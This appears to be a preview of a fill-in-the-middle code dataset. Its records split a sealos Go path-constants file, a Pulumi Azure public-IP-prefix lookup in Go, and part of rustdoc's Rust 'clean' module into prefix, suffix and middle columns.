file_name
stringlengths 3
137
| prefix
stringlengths 0
918k
| suffix
stringlengths 0
962k
| middle
stringlengths 0
812k
|
---|---|---|---|
data.go | /*
Copyright 2022 [email protected].
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package contants
import "path/filepath"
const (
DefaultClusterRootfsDir = "/var/lib/sealos"
DefaultInitKubeadmFileName = "kubeadm-init.yaml"
DefaultJoinMasterKubeadmFileName = "kubeadm-join-master.yaml"
DefaultJoinNodeKubeadmFileName = "kubeadm-join-node.yaml"
DefaultKubeadmTokenFileName = "kubeadm-token.yaml"
DefaultRootfsKubeadmFileName = "kubeadm.yml"
DataDirName = "rootfs"
EtcDirName = "etc"
ChartsDirName = "charts"
ManifestsDirName = "manifests"
RegistryDirName = "registry"
ImagesDirName = "images"
ImageShimDirName = "shim"
PkiDirName = "pki"
PkiEtcdDirName = "etcd"
ScriptsDirName = "scripts"
StaticsDirName = "statics"
)
func LogPath() string {
return filepath.Join(DefaultClusterRootfsDir, "logs")
}
func DataPath() string {
return filepath.Join(DefaultClusterRootfsDir, "data")
}
type Data interface {
Homedir() string
RootFSPath() string
RootFSEtcPath() string
RootFSStaticsPath() string
RootFSScriptsPath() string
RootFSRegistryPath() string
PkiPath() string
PkiEtcdPath() string
AdminFile() string
EtcPath() string
TmpPath() string
RootFSCharsPath() string
RootFSManifestsPath() string
RootFSSealctlPath() string
}
type data struct {
clusterName string
}
func (d *data) RootFSSealctlPath() string {
return filepath.Join(d.RootFSPath(), "opt", "sealctl")
}
func (d *data) RootFSScriptsPath() string {
return filepath.Join(d.RootFSPath(), ScriptsDirName)
}
func (d *data) RootFSEtcPath() string {
return filepath.Join(d.RootFSPath(), EtcDirName)
}
func (d *data) RootFSRegistryPath() string {
return filepath.Join(d.RootFSPath(), RegistryDirName)
}
func (d *data) RootFSCharsPath() string {
return filepath.Join(d.RootFSPath(), ChartsDirName)
}
func (d *data) RootFSManifestsPath() string {
return filepath.Join(d.RootFSPath(), ManifestsDirName)
}
func (d *data) EtcPath() string {
return filepath.Join(d.Homedir(), EtcDirName)
}
func (d *data) AdminFile() string {
return filepath.Join(d.EtcPath(), "admin.conf")
}
func (d *data) PkiPath() string {
return filepath.Join(d.Homedir(), PkiDirName)
}
func (d *data) PkiEtcdPath() string {
return filepath.Join(d.PkiPath(), PkiEtcdDirName)
}
func (d *data) TmpPath() string {
return filepath.Join(d.Homedir(), "tmp")
}
func (d *data) RootFSPath() string {
return filepath.Join(d.Homedir(), DataDirName)
}
func (d *data) RootFSStaticsPath() string {
return filepath.Join(d.RootFSPath(), StaticsDirName)
}
func (d *data) Homedir() string {
return filepath.Join(DefaultClusterRootfsDir, "data", d.clusterName)
}
func NewData(clusterName string) Data | {
return &data{
clusterName: clusterName,
}
} |
|
getPublicIPPrefix.go | // *** WARNING: this file was generated by the Pulumi SDK Generator. ***
// *** Do not edit by hand unless you're certain you know what you are doing! ***
package v20200601
import (
"github.com/pulumi/pulumi/sdk/v2/go/pulumi"
)
// Public IP prefix resource.
func | (ctx *pulumi.Context, args *LookupPublicIPPrefixArgs, opts ...pulumi.InvokeOption) (*LookupPublicIPPrefixResult, error) {
var rv LookupPublicIPPrefixResult
err := ctx.Invoke("azure-nextgen:network/v20200601:getPublicIPPrefix", args, &rv, opts...)
if err != nil {
return nil, err
}
return &rv, nil
}
type LookupPublicIPPrefixArgs struct {
// Expands referenced resources.
Expand *string `pulumi:"expand"`
// The name of the public IP prefix.
PublicIpPrefixName string `pulumi:"publicIpPrefixName"`
// The name of the resource group.
ResourceGroupName string `pulumi:"resourceGroupName"`
}
// Public IP prefix resource.
type LookupPublicIPPrefixResult struct {
// The customIpPrefix that this prefix is associated with.
CustomIPPrefix *SubResourceResponse `pulumi:"customIPPrefix"`
// A unique read-only string that changes whenever the resource is updated.
Etag string `pulumi:"etag"`
// Resource ID.
Id *string `pulumi:"id"`
// The allocated Prefix.
IpPrefix string `pulumi:"ipPrefix"`
// The list of tags associated with the public IP prefix.
IpTags []IpTagResponse `pulumi:"ipTags"`
// The reference to load balancer frontend IP configuration associated with the public IP prefix.
LoadBalancerFrontendIpConfiguration SubResourceResponse `pulumi:"loadBalancerFrontendIpConfiguration"`
// Resource location.
Location *string `pulumi:"location"`
// Resource name.
Name string `pulumi:"name"`
// The Length of the Public IP Prefix.
PrefixLength *int `pulumi:"prefixLength"`
// The provisioning state of the public IP prefix resource.
ProvisioningState string `pulumi:"provisioningState"`
// The public IP address version.
PublicIPAddressVersion *string `pulumi:"publicIPAddressVersion"`
// The list of all referenced PublicIPAddresses.
PublicIPAddresses []ReferencedPublicIpAddressResponse `pulumi:"publicIPAddresses"`
// The resource GUID property of the public IP prefix resource.
ResourceGuid string `pulumi:"resourceGuid"`
// The public IP prefix SKU.
Sku *PublicIPPrefixSkuResponse `pulumi:"sku"`
// Resource tags.
Tags map[string]string `pulumi:"tags"`
// Resource type.
Type string `pulumi:"type"`
// A list of availability zones denoting the IP allocated for the resource needs to come from.
Zones []string `pulumi:"zones"`
}
| LookupPublicIPPrefix |
mod.rs | // Copyright 2012-2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! This module contains the "cleaned" pieces of the AST, and the functions
//! that clean them.
pub use self::Type::*;
pub use self::Mutability::*;
pub use self::ItemEnum::*;
pub use self::SelfTy::*;
pub use self::FunctionRetTy::*;
pub use self::Visibility::{Public, Inherited};
use rustc_target::spec::abi::Abi;
use syntax;
use syntax::ast::{self, AttrStyle, NodeId, Ident};
use syntax::attr;
use syntax::codemap::{dummy_spanned, Spanned};
use syntax::feature_gate::UnstableFeatures;
use syntax::ptr::P;
use syntax::symbol::keywords::{self, Keyword};
use syntax::symbol::{Symbol, InternedString};
use syntax_pos::{self, DUMMY_SP, Pos, FileName};
use rustc::mir::interpret::ConstValue;
use rustc::middle::privacy::AccessLevels;
use rustc::middle::resolve_lifetime as rl;
use rustc::ty::fold::TypeFolder;
use rustc::middle::lang_items;
use rustc::mir::interpret::GlobalId;
use rustc::hir::{self, GenericArg, HirVec};
use rustc::hir::def::{self, Def, CtorKind};
use rustc::hir::def_id::{CrateNum, DefId, DefIndex, CRATE_DEF_INDEX, LOCAL_CRATE};
use rustc::hir::def_id::DefIndexAddressSpace;
use rustc::ty::subst::Substs;
use rustc::ty::{self, TyCtxt, Region, RegionVid, Ty, AdtKind};
use rustc::middle::stability;
use rustc::util::nodemap::{FxHashMap, FxHashSet};
use rustc_typeck::hir_ty_to_ty;
use rustc::infer::region_constraints::{RegionConstraintData, Constraint};
use rustc::lint as lint;
use std::collections::hash_map::Entry;
use std::fmt;
use std::default::Default;
use std::{mem, slice, vec};
use std::iter::{FromIterator, once};
use rustc_data_structures::sync::Lrc;
use std::rc::Rc;
use std::str::FromStr;
use std::cell::RefCell;
use std::sync::Arc;
use std::u32;
use std::ops::Range;
use core::{self, DocContext};
use doctree;
use visit_ast;
use html::render::{cache, ExternalLocation};
use html::item_type::ItemType;
use html::markdown::markdown_links;
pub mod inline;
pub mod cfg;
mod simplify;
mod auto_trait;
use self::cfg::Cfg;
use self::auto_trait::AutoTraitFinder;
thread_local!(static MAX_DEF_ID: RefCell<FxHashMap<CrateNum, DefId>> = RefCell::new(FxHashMap()));
const FN_OUTPUT_NAME: &'static str = "Output";
// extract the stability index for a node from tcx, if possible
fn get_stability(cx: &DocContext, def_id: DefId) -> Option<Stability> {
cx.tcx.lookup_stability(def_id).clean(cx)
}
fn get_deprecation(cx: &DocContext, def_id: DefId) -> Option<Deprecation> {
cx.tcx.lookup_deprecation(def_id).clean(cx)
}
pub trait Clean<T> {
fn clean(&self, cx: &DocContext) -> T;
}
impl<T: Clean<U>, U> Clean<Vec<U>> for [T] {
fn clean(&self, cx: &DocContext) -> Vec<U> {
self.iter().map(|x| x.clean(cx)).collect()
}
}
impl<T: Clean<U>, U> Clean<U> for P<T> {
fn clean(&self, cx: &DocContext) -> U {
(**self).clean(cx)
}
}
impl<T: Clean<U>, U> Clean<U> for Rc<T> {
fn clean(&self, cx: &DocContext) -> U {
(**self).clean(cx)
}
}
impl<T: Clean<U>, U> Clean<Option<U>> for Option<T> {
fn clean(&self, cx: &DocContext) -> Option<U> {
self.as_ref().map(|v| v.clean(cx))
}
}
impl<T, U> Clean<U> for ty::Binder<T> where T: Clean<U> {
fn clean(&self, cx: &DocContext) -> U {
self.skip_binder().clean(cx)
}
}
impl<T: Clean<U>, U> Clean<Vec<U>> for P<[T]> {
fn clean(&self, cx: &DocContext) -> Vec<U> {
self.iter().map(|x| x.clean(cx)).collect()
}
}
#[derive(Clone, Debug)]
pub struct Crate {
pub name: String,
pub version: Option<String>,
pub src: FileName,
pub module: Option<Item>,
pub externs: Vec<(CrateNum, ExternalCrate)>,
pub primitives: Vec<(DefId, PrimitiveType, Attributes)>,
pub access_levels: Arc<AccessLevels<DefId>>,
// These are later on moved into `CACHEKEY`, leaving the map empty.
// Only here so that they can be filtered through the rustdoc passes.
pub external_traits: FxHashMap<DefId, Trait>,
pub masked_crates: FxHashSet<CrateNum>,
}
impl<'a, 'tcx, 'rcx> Clean<Crate> for visit_ast::RustdocVisitor<'a, 'tcx, 'rcx> {
fn clean(&self, cx: &DocContext) -> Crate {
use ::visit_lib::LibEmbargoVisitor;
{
let mut r = cx.renderinfo.borrow_mut();
r.deref_trait_did = cx.tcx.lang_items().deref_trait();
r.deref_mut_trait_did = cx.tcx.lang_items().deref_mut_trait();
r.owned_box_did = cx.tcx.lang_items().owned_box();
}
let mut externs = Vec::new();
for &cnum in cx.tcx.crates().iter() {
externs.push((cnum, cnum.clean(cx)));
// Analyze doc-reachability for extern items
LibEmbargoVisitor::new(cx).visit_lib(cnum);
}
externs.sort_by(|&(a, _), &(b, _)| a.cmp(&b));
// Clean the crate, translating the entire libsyntax AST to one that is
// understood by rustdoc.
let mut module = self.module.clean(cx);
let mut masked_crates = FxHashSet();
match module.inner {
ModuleItem(ref module) => {
for it in &module.items {
if it.is_extern_crate() && it.attrs.has_doc_flag("masked") {
masked_crates.insert(it.def_id.krate);
}
}
}
_ => unreachable!(),
}
let ExternalCrate { name, src, primitives, keywords, .. } = LOCAL_CRATE.clean(cx);
{
let m = match module.inner {
ModuleItem(ref mut m) => m,
_ => unreachable!(),
};
m.items.extend(primitives.iter().map(|&(def_id, prim, ref attrs)| {
Item {
source: Span::empty(),
name: Some(prim.to_url_str().to_string()),
attrs: attrs.clone(),
visibility: Some(Public),
stability: get_stability(cx, def_id),
deprecation: get_deprecation(cx, def_id),
def_id,
inner: PrimitiveItem(prim),
}
}));
m.items.extend(keywords.into_iter().map(|(def_id, kw, attrs)| {
Item {
source: Span::empty(),
name: Some(kw.clone()),
attrs: attrs,
visibility: Some(Public),
stability: get_stability(cx, def_id),
deprecation: get_deprecation(cx, def_id),
def_id,
inner: KeywordItem(kw),
}
}));
}
let mut access_levels = cx.access_levels.borrow_mut();
let mut external_traits = cx.external_traits.borrow_mut();
Crate {
name,
version: None,
src,
module: Some(module),
externs,
primitives,
access_levels: Arc::new(mem::replace(&mut access_levels, Default::default())),
external_traits: mem::replace(&mut external_traits, Default::default()),
masked_crates,
}
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct ExternalCrate {
pub name: String,
pub src: FileName,
pub attrs: Attributes,
pub primitives: Vec<(DefId, PrimitiveType, Attributes)>,
pub keywords: Vec<(DefId, String, Attributes)>,
}
impl Clean<ExternalCrate> for CrateNum {
fn clean(&self, cx: &DocContext) -> ExternalCrate {
let root = DefId { krate: *self, index: CRATE_DEF_INDEX };
let krate_span = cx.tcx.def_span(root);
let krate_src = cx.sess().codemap().span_to_filename(krate_span);
// Collect all inner modules which are tagged as implementations of
// primitives.
//
// Note that this loop only searches the top-level items of the crate,
// and this is intentional. If we were to search the entire crate for an
// item tagged with `#[doc(primitive)]` then we would also have to
// search the entirety of external modules for items tagged
// `#[doc(primitive)]`, which is a pretty inefficient process (decoding
// all that metadata unconditionally).
//
// In order to keep the metadata load under control, the
// `#[doc(primitive)]` feature is explicitly designed to only allow the
// primitive tags to show up as the top level items in a crate.
//
// Also note that this does not attempt to deal with modules tagged
// duplicately for the same primitive. This is handled later on when
// rendering by delegating everything to a hash map.
let as_primitive = |def: Def| {
if let Def::Mod(def_id) = def {
let attrs = cx.tcx.get_attrs(def_id).clean(cx);
let mut prim = None;
for attr in attrs.lists("doc") {
if let Some(v) = attr.value_str() {
if attr.check_name("primitive") {
prim = PrimitiveType::from_str(&v.as_str());
if prim.is_some() {
break;
}
// FIXME: should warn on unknown primitives?
}
}
}
return prim.map(|p| (def_id, p, attrs));
}
None
};
let primitives = if root.is_local() {
cx.tcx.hir.krate().module.item_ids.iter().filter_map(|&id| {
let item = cx.tcx.hir.expect_item(id.id);
match item.node {
hir::ItemMod(_) => {
as_primitive(Def::Mod(cx.tcx.hir.local_def_id(id.id)))
}
hir::ItemUse(ref path, hir::UseKind::Single)
if item.vis.node.is_pub() => {
as_primitive(path.def).map(|(_, prim, attrs)| {
// Pretend the primitive is local.
(cx.tcx.hir.local_def_id(id.id), prim, attrs)
})
}
_ => None
}
}).collect()
} else {
cx.tcx.item_children(root).iter().map(|item| item.def)
.filter_map(as_primitive).collect()
};
let as_keyword = |def: Def| {
if let Def::Mod(def_id) = def {
let attrs = cx.tcx.get_attrs(def_id).clean(cx);
let mut keyword = None;
for attr in attrs.lists("doc") {
if let Some(v) = attr.value_str() {
if attr.check_name("keyword") {
keyword = Keyword::from_str(&v.as_str()).ok()
.map(|x| x.name().to_string());
if keyword.is_some() {
break
}
// FIXME: should warn on unknown keywords?
}
}
}
return keyword.map(|p| (def_id, p, attrs));
}
None
};
let keywords = if root.is_local() {
cx.tcx.hir.krate().module.item_ids.iter().filter_map(|&id| {
let item = cx.tcx.hir.expect_item(id.id);
match item.node {
hir::ItemMod(_) => {
as_keyword(Def::Mod(cx.tcx.hir.local_def_id(id.id)))
}
hir::ItemUse(ref path, hir::UseKind::Single)
if item.vis.node.is_pub() => {
as_keyword(path.def).map(|(_, prim, attrs)| {
(cx.tcx.hir.local_def_id(id.id), prim, attrs)
})
}
_ => None
}
}).collect()
} else {
cx.tcx.item_children(root).iter().map(|item| item.def)
.filter_map(as_keyword).collect()
};
ExternalCrate {
name: cx.tcx.crate_name(*self).to_string(),
src: krate_src,
attrs: cx.tcx.get_attrs(root).clean(cx),
primitives,
keywords,
}
}
}
/// Anything with a source location and set of attributes and, optionally, a
/// name. That is, anything that can be documented. This doesn't correspond
/// directly to the AST's concept of an item; it's a strict superset.
#[derive(Clone, RustcEncodable, RustcDecodable)]
pub struct Item {
/// Stringified span
pub source: Span,
/// Not everything has a name. E.g., impls
pub name: Option<String>,
pub attrs: Attributes,
pub inner: ItemEnum,
pub visibility: Option<Visibility>,
pub def_id: DefId,
pub stability: Option<Stability>,
pub deprecation: Option<Deprecation>,
}
impl fmt::Debug for Item {
fn fmt(&self, fmt: &mut fmt::Formatter) -> fmt::Result {
let fake = MAX_DEF_ID.with(|m| m.borrow().get(&self.def_id.krate)
.map(|id| self.def_id >= *id).unwrap_or(false));
let def_id: &fmt::Debug = if fake { &"**FAKE**" } else { &self.def_id };
fmt.debug_struct("Item")
.field("source", &self.source)
.field("name", &self.name)
.field("attrs", &self.attrs)
.field("inner", &self.inner)
.field("visibility", &self.visibility)
.field("def_id", def_id)
.field("stability", &self.stability)
.field("deprecation", &self.deprecation)
.finish()
}
}
impl Item {
/// Finds the `doc` attribute as a NameValue and returns the corresponding
/// value found.
pub fn doc_value<'a>(&'a self) -> Option<&'a str> {
self.attrs.doc_value()
}
/// Finds all `doc` attributes as NameValues and returns their corresponding values, joined
/// with newlines.
pub fn collapsed_doc_value(&self) -> Option<String> {
self.attrs.collapsed_doc_value()
}
pub fn links(&self) -> Vec<(String, String)> {
self.attrs.links(&self.def_id.krate)
}
pub fn is_crate(&self) -> bool {
match self.inner {
StrippedItem(box ModuleItem(Module { is_crate: true, ..})) |
ModuleItem(Module { is_crate: true, ..}) => true,
_ => false,
}
}
pub fn is_mod(&self) -> bool {
self.type_() == ItemType::Module
}
pub fn is_trait(&self) -> bool {
self.type_() == ItemType::Trait
}
pub fn is_struct(&self) -> bool {
self.type_() == ItemType::Struct
}
pub fn is_enum(&self) -> bool {
self.type_() == ItemType::Enum
}
pub fn is_fn(&self) -> bool {
self.type_() == ItemType::Function
}
pub fn is_associated_type(&self) -> bool {
self.type_() == ItemType::AssociatedType
}
pub fn is_associated_const(&self) -> bool {
self.type_() == ItemType::AssociatedConst
}
pub fn is_method(&self) -> bool {
self.type_() == ItemType::Method
}
pub fn is_ty_method(&self) -> bool {
self.type_() == ItemType::TyMethod
}
pub fn is_typedef(&self) -> bool {
self.type_() == ItemType::Typedef
}
pub fn is_primitive(&self) -> bool {
self.type_() == ItemType::Primitive
}
pub fn is_union(&self) -> bool {
self.type_() == ItemType::Union
}
pub fn is_import(&self) -> bool {
self.type_() == ItemType::Import
}
pub fn is_extern_crate(&self) -> bool {
self.type_() == ItemType::ExternCrate
}
pub fn is_keyword(&self) -> bool {
self.type_() == ItemType::Keyword
}
pub fn is_stripped(&self) -> bool {
match self.inner { StrippedItem(..) => true, _ => false }
}
pub fn has_stripped_fields(&self) -> Option<bool> {
match self.inner {
StructItem(ref _struct) => Some(_struct.fields_stripped),
UnionItem(ref union) => Some(union.fields_stripped),
VariantItem(Variant { kind: VariantKind::Struct(ref vstruct)} ) => {
Some(vstruct.fields_stripped)
},
_ => None,
}
}
pub fn stability_class(&self) -> Option<String> {
self.stability.as_ref().and_then(|ref s| {
let mut classes = Vec::with_capacity(2);
if s.level == stability::Unstable {
classes.push("unstable");
}
if !s.deprecated_since.is_empty() {
classes.push("deprecated");
}
if classes.len() != 0 {
Some(classes.join(" "))
} else {
None
}
})
}
pub fn stable_since(&self) -> Option<&str> {
self.stability.as_ref().map(|s| &s.since[..])
}
/// Returns a documentation-level item type from the item.
pub fn type_(&self) -> ItemType {
ItemType::from(self)
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub enum ItemEnum {
ExternCrateItem(String, Option<String>),
ImportItem(Import),
StructItem(Struct),
UnionItem(Union),
EnumItem(Enum),
FunctionItem(Function),
ModuleItem(Module),
TypedefItem(Typedef, bool /* is associated type */),
StaticItem(Static),
ConstantItem(Constant),
TraitItem(Trait),
ImplItem(Impl),
/// A method signature only. Used for required methods in traits (ie,
/// non-default-methods).
TyMethodItem(TyMethod),
/// A method with a body.
MethodItem(Method),
StructFieldItem(Type),
VariantItem(Variant),
/// `fn`s from an extern block
ForeignFunctionItem(Function),
/// `static`s from an extern block
ForeignStaticItem(Static),
/// `type`s from an extern block
ForeignTypeItem,
MacroItem(Macro),
PrimitiveItem(PrimitiveType),
AssociatedConstItem(Type, Option<String>),
AssociatedTypeItem(Vec<GenericBound>, Option<Type>),
/// An item that has been stripped by a rustdoc pass
StrippedItem(Box<ItemEnum>),
KeywordItem(String),
}
impl ItemEnum {
pub fn generics(&self) -> Option<&Generics> {
Some(match *self {
ItemEnum::StructItem(ref s) => &s.generics,
ItemEnum::EnumItem(ref e) => &e.generics,
ItemEnum::FunctionItem(ref f) => &f.generics,
ItemEnum::TypedefItem(ref t, _) => &t.generics,
ItemEnum::TraitItem(ref t) => &t.generics,
ItemEnum::ImplItem(ref i) => &i.generics,
ItemEnum::TyMethodItem(ref i) => &i.generics,
ItemEnum::MethodItem(ref i) => &i.generics,
ItemEnum::ForeignFunctionItem(ref f) => &f.generics,
_ => return None,
})
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Module {
pub items: Vec<Item>,
pub is_crate: bool,
}
impl Clean<Item> for doctree::Module {
fn clean(&self, cx: &DocContext) -> Item {
let name = if self.name.is_some() {
self.name.unwrap().clean(cx)
} else {
"".to_string()
};
// maintain a stack of mod ids, for doc comment path resolution
// but we also need to resolve the module's own docs based on whether its docs were written
// inside or outside the module, so check for that
let attrs = if self.attrs.iter()
.filter(|a| a.check_name("doc"))
.next()
.map_or(true, |a| a.style == AttrStyle::Inner) {
// inner doc comment, use the module's own scope for resolution
cx.mod_ids.borrow_mut().push(self.id);
self.attrs.clean(cx)
} else {
// outer doc comment, use its parent's scope
let attrs = self.attrs.clean(cx);
cx.mod_ids.borrow_mut().push(self.id);
attrs
};
let mut items: Vec<Item> = vec![];
items.extend(self.extern_crates.iter().map(|x| x.clean(cx)));
items.extend(self.imports.iter().flat_map(|x| x.clean(cx)));
items.extend(self.structs.iter().flat_map(|x| x.clean(cx)));
items.extend(self.unions.iter().flat_map(|x| x.clean(cx)));
items.extend(self.enums.iter().flat_map(|x| x.clean(cx)));
items.extend(self.fns.iter().map(|x| x.clean(cx)));
items.extend(self.foreigns.iter().flat_map(|x| x.clean(cx)));
items.extend(self.mods.iter().map(|x| x.clean(cx)));
items.extend(self.typedefs.iter().map(|x| x.clean(cx)));
items.extend(self.statics.iter().map(|x| x.clean(cx)));
items.extend(self.constants.iter().map(|x| x.clean(cx)));
items.extend(self.traits.iter().map(|x| x.clean(cx)));
items.extend(self.impls.iter().flat_map(|x| x.clean(cx)));
items.extend(self.macros.iter().map(|x| x.clean(cx)));
cx.mod_ids.borrow_mut().pop();
// determine if we should display the inner contents or
// the outer `mod` item for the source code.
let whence = {
let cm = cx.sess().codemap();
let outer = cm.lookup_char_pos(self.where_outer.lo());
let inner = cm.lookup_char_pos(self.where_inner.lo());
if outer.file.start_pos == inner.file.start_pos {
// mod foo { ... }
self.where_outer
} else {
// mod foo; (and a separate FileMap for the contents)
self.where_inner
}
};
Item {
name: Some(name),
attrs,
source: whence.clean(cx),
visibility: self.vis.clean(cx),
stability: self.stab.clean(cx),
deprecation: self.depr.clean(cx),
def_id: cx.tcx.hir.local_def_id(self.id),
inner: ModuleItem(Module {
is_crate: self.is_crate,
items,
})
}
}
}
pub struct ListAttributesIter<'a> {
attrs: slice::Iter<'a, ast::Attribute>,
current_list: vec::IntoIter<ast::NestedMetaItem>,
name: &'a str
}
impl<'a> Iterator for ListAttributesIter<'a> {
type Item = ast::NestedMetaItem;
fn next(&mut self) -> Option<Self::Item> {
if let Some(nested) = self.current_list.next() {
return Some(nested);
}
for attr in &mut self.attrs {
if let Some(list) = attr.meta_item_list() {
if attr.check_name(self.name) {
self.current_list = list.into_iter();
if let Some(nested) = self.current_list.next() {
return Some(nested);
}
}
}
}
None
}
fn size_hint(&self) -> (usize, Option<usize>) {
let lower = self.current_list.len();
(lower, None)
}
}
pub trait AttributesExt {
/// Finds an attribute as List and returns the list of attributes nested inside.
fn lists<'a>(&'a self, name: &'a str) -> ListAttributesIter<'a>;
}
impl AttributesExt for [ast::Attribute] {
fn lists<'a>(&'a self, name: &'a str) -> ListAttributesIter<'a> {
ListAttributesIter {
attrs: self.iter(),
current_list: Vec::new().into_iter(),
name,
}
}
}
pub trait NestedAttributesExt {
/// Returns whether the attribute list contains a specific `Word`
fn has_word(self, word: &str) -> bool;
}
impl<I: IntoIterator<Item=ast::NestedMetaItem>> NestedAttributesExt for I {
fn has_word(self, word: &str) -> bool {
self.into_iter().any(|attr| attr.is_word() && attr.check_name(word))
}
}
/// A portion of documentation, extracted from a `#[doc]` attribute.
///
/// Each variant contains the line number within the complete doc-comment where the fragment
/// starts, as well as the Span where the corresponding doc comment or attribute is located.
///
/// Included files are kept separate from inline doc comments so that proper line-number
/// information can be given when a doctest fails. Sugared doc comments and "raw" doc comments are
/// kept separate because of issue #42760.
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub enum DocFragment {
// FIXME #44229 (misdreavus): sugared and raw doc comments can be brought back together once
// hoedown is completely removed from rustdoc.
/// A doc fragment created from a `///` or `//!` doc comment.
SugaredDoc(usize, syntax_pos::Span, String),
/// A doc fragment created from a "raw" `#[doc=""]` attribute.
RawDoc(usize, syntax_pos::Span, String),
/// A doc fragment created from a `#[doc(include="filename")]` attribute. Contains both the
/// given filename and the file contents.
Include(usize, syntax_pos::Span, String, String),
}
impl DocFragment {
pub fn as_str(&self) -> &str {
match *self {
DocFragment::SugaredDoc(_, _, ref s) => &s[..],
DocFragment::RawDoc(_, _, ref s) => &s[..],
DocFragment::Include(_, _, _, ref s) => &s[..],
}
}
pub fn span(&self) -> syntax_pos::Span {
match *self {
DocFragment::SugaredDoc(_, span, _) |
DocFragment::RawDoc(_, span, _) |
DocFragment::Include(_, span, _, _) => span,
}
}
}
impl<'a> FromIterator<&'a DocFragment> for String {
fn from_iter<T>(iter: T) -> Self
where
T: IntoIterator<Item = &'a DocFragment>
{
iter.into_iter().fold(String::new(), |mut acc, frag| {
if !acc.is_empty() {
acc.push('\n');
}
match *frag {
DocFragment::SugaredDoc(_, _, ref docs)
| DocFragment::RawDoc(_, _, ref docs)
| DocFragment::Include(_, _, _, ref docs) =>
acc.push_str(docs),
}
acc
})
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Default, Hash)]
pub struct Attributes {
pub doc_strings: Vec<DocFragment>,
pub other_attrs: Vec<ast::Attribute>,
pub cfg: Option<Arc<Cfg>>,
pub span: Option<syntax_pos::Span>,
/// map from Rust paths to resolved defs and potential URL fragments
pub links: Vec<(String, Option<DefId>, Option<String>)>,
}
impl Attributes {
/// Extracts the content from an attribute `#[doc(cfg(content))]`.
fn extract_cfg(mi: &ast::MetaItem) -> Option<&ast::MetaItem> {
use syntax::ast::NestedMetaItemKind::MetaItem;
if let ast::MetaItemKind::List(ref nmis) = mi.node {
if nmis.len() == 1 {
if let MetaItem(ref cfg_mi) = nmis[0].node {
if cfg_mi.check_name("cfg") {
if let ast::MetaItemKind::List(ref cfg_nmis) = cfg_mi.node {
if cfg_nmis.len() == 1 {
if let MetaItem(ref content_mi) = cfg_nmis[0].node {
return Some(content_mi);
}
}
}
}
}
}
}
None
}
/// Reads a `MetaItem` from within an attribute, looks for whether it is a
/// `#[doc(include="file")]`, and returns the filename and contents of the file as loaded from
/// its expansion.
fn extract_include(mi: &ast::MetaItem)
-> Option<(String, String)>
{
mi.meta_item_list().and_then(|list| {
for meta in list {
if meta.check_name("include") {
// the actual compiled `#[doc(include="filename")]` gets expanded to
// `#[doc(include(file="filename", contents="file contents")]` so we need to
// look for that instead
return meta.meta_item_list().and_then(|list| {
let mut filename: Option<String> = None;
let mut contents: Option<String> = None;
for it in list {
if it.check_name("file") {
if let Some(name) = it.value_str() {
filename = Some(name.to_string());
}
} else if it.check_name("contents") {
if let Some(docs) = it.value_str() {
contents = Some(docs.to_string());
}
}
}
if let (Some(filename), Some(contents)) = (filename, contents) {
Some((filename, contents))
} else {
None
}
});
}
}
None
})
}
pub fn has_doc_flag(&self, flag: &str) -> bool {
for attr in &self.other_attrs {
if !attr.check_name("doc") { continue; }
if let Some(items) = attr.meta_item_list() {
if items.iter().filter_map(|i| i.meta_item()).any(|it| it.check_name(flag)) {
return true;
}
}
}
false
}
pub fn from_ast(diagnostic: &::errors::Handler,
attrs: &[ast::Attribute]) -> Attributes {
let mut doc_strings = vec![];
let mut sp = None;
let mut cfg = Cfg::True;
let mut doc_line = 0;
let other_attrs = attrs.iter().filter_map(|attr| {
attr.with_desugared_doc(|attr| {
if attr.check_name("doc") {
if let Some(mi) = attr.meta() {
if let Some(value) = mi.value_str() {
// Extracted #[doc = "..."]
let value = value.to_string();
let line = doc_line;
doc_line += value.lines().count();
if attr.is_sugared_doc {
doc_strings.push(DocFragment::SugaredDoc(line, attr.span, value));
} else {
doc_strings.push(DocFragment::RawDoc(line, attr.span, value));
}
if sp.is_none() {
sp = Some(attr.span);
}
return None;
} else if let Some(cfg_mi) = Attributes::extract_cfg(&mi) {
// Extracted #[doc(cfg(...))]
match Cfg::parse(cfg_mi) {
Ok(new_cfg) => cfg &= new_cfg,
Err(e) => diagnostic.span_err(e.span, e.msg),
}
return None;
} else if let Some((filename, contents)) = Attributes::extract_include(&mi)
{
let line = doc_line;
doc_line += contents.lines().count();
doc_strings.push(DocFragment::Include(line,
attr.span,
filename,
contents));
}
}
}
Some(attr.clone())
})
}).collect();
// treat #[target_feature(enable = "feat")] attributes as if they were
// #[doc(cfg(target_feature = "feat"))] attributes as well
for attr in attrs.lists("target_feature") {
if attr.check_name("enable") {
if let Some(feat) = attr.value_str() {
let meta = attr::mk_name_value_item_str(Ident::from_str("target_feature"),
dummy_spanned(feat));
if let Ok(feat_cfg) = Cfg::parse(&meta) {
cfg &= feat_cfg;
}
}
}
}
Attributes {
doc_strings,
other_attrs,
cfg: if cfg == Cfg::True { None } else { Some(Arc::new(cfg)) },
span: sp,
links: vec![],
}
}
/// Finds the `doc` attribute as a NameValue and returns the corresponding
/// value found.
pub fn doc_value<'a>(&'a self) -> Option<&'a str> {
self.doc_strings.first().map(|s| s.as_str())
}
/// Finds all `doc` attributes as NameValues and returns their corresponding values, joined
/// with newlines.
pub fn collapsed_doc_value(&self) -> Option<String> {
if !self.doc_strings.is_empty() {
Some(self.doc_strings.iter().collect())
} else {
None
}
}
/// Get links as a vector
///
/// Cache must be populated before call
pub fn links(&self, krate: &CrateNum) -> Vec<(String, String)> {
